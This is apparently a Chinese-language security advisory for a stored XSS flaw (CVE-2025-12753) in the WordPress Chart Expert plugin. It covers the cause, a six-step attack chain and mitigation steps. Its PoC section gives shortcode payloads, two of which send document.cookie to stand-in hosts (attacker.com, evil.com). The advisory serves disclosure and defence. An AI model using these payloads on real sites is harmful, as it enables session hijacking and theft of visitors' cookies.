CVE-2025-12753 WordPress Chart Expert插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12753

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Chart Expert plugin for WordPress

漏洞概述

Chart Expert是WordPress平台上一款用于创建图表的插件，该插件在处理短代码（shortcode）属性时存在严重的存储型跨站脚本（Stored XSS）漏洞。漏洞编号为CVE-2025-12753，CVSS评分6.4，属于中危级别。攻击者可以利用该漏洞通过'pmzez_chart'短代码注入恶意JavaScript代码，这些代码会被永久存储在数据库中。当其他用户访问包含恶意代码的页面时，注入的脚本将自动执行，可能导致会话劫持、敏感信息窃取、恶意重定向等严重后果。由于漏洞需要认证用户才能利用，攻击者需要具备WordPress contributor级别或更高的权限，这降低了漏洞的利用门槛但仍对多用户WordPress网站构成威胁。

技术细节

该漏洞的根本原因在于Chart Expert插件的短代码处理逻辑中缺少适当的输入验证和输出转义。具体问题出现在inc/shortcode.php文件中，插件在处理pmzez_chart短代码的属性参数时，直接将用户提供的属性值插入到HTML输出中而未进行安全过滤。攻击者可以通过构造特殊的短代码属性来注入任意JavaScript代码。例如，在短代码属性中插入onerror事件处理器、javascript:伪协议链接或其他XSS payload。恶意代码会被WordPress保存到数据库中，并在页面加载时从数据库读取并执行。由于存储型XSS的特性，攻击一次即可影响所有访问该页面的用户，包括管理员。攻击者通常利用此漏洞窃取管理员会话cookie、修改页面内容或进行进一步的攻击链利用。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用的WordPress版本，确认安装了Chart Expert插件并获取其版本号（<=1.0）

STEP 2

步骤2：账户获取

攻击者获取WordPress账户访问权限，需要至少具有contributor（贡献者）级别的用户权限，可通过凭据盗取、社会工程学或利用其他漏洞获取

STEP 3

步骤3：恶意Payload构造

攻击者构造包含XSS payload的pmzez_chart短代码，如使用onerror事件处理器或javascript:伪协议来注入JavaScript代码

STEP 4

步骤4：注入恶意代码

在WordPress文章或页面中插入构造好的恶意短代码并发布，payload被存储到数据库中

STEP 5

步骤5：触发执行

当其他用户（受害者）访问包含恶意短代码的页面时，浏览器会解析并执行注入的JavaScript代码

STEP 6

步骤6：恶意行为执行

注入的脚本执行各种恶意操作，如窃取会话cookie、劫持用户账户、重定向用户到钓鱼网站或修改页面内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12753 PoC - WordPress Chart Expert Stored XSS -->
<!-- Payload: Inject malicious JavaScript via pmzez_chart shortcode -->
<!-- Requires: Contributor-level WordPress account or higher -->

<!-- Basic XSS via onerror attribute -->
[pmzez_chart chart_id='1' onerror='alert(document.cookie)']

<!-- XSS via javascript: protocol in src attribute -->
[pmzez_chart src='javascript:alert("XSS by Chart Expert")']

<!-- XSS via event handler in title attribute -->
[pmzez_chart title='<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>']

<!-- Stored XSS payload - script executes when page is viewed -->
[pmzez_chart data='{"test": "<script>fetch("https://evil.com/log?cookie="+btoa(document.cookie))</script>"}']

<!-- exploitation steps:
1. Login to WordPress with contributor or higher privileges
2. Create or edit a post/page
3. Insert the malicious shortcode
4. Save/publish the content
5. Any user viewing the page will execute the injected JavaScript
-->

影响范围

Chart Expert plugin for WordPress <= 1.0

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）立即禁用Chart Expert插件；2）检查并删除所有包含可疑短代码的文章和页面；3）重置所有可能泄露的管理员密码和会话token；4）使用Web应用防火墙（WAF）规则阻止包含XSS特征的请求；5）审查所有具有contributor及以上权限的账户，移除可疑账户；6）启用WordPress的强制HTTPS和HttpOnly cookie设置；7）定期检查服务器日志和WordPress审计日志，监控异常活动。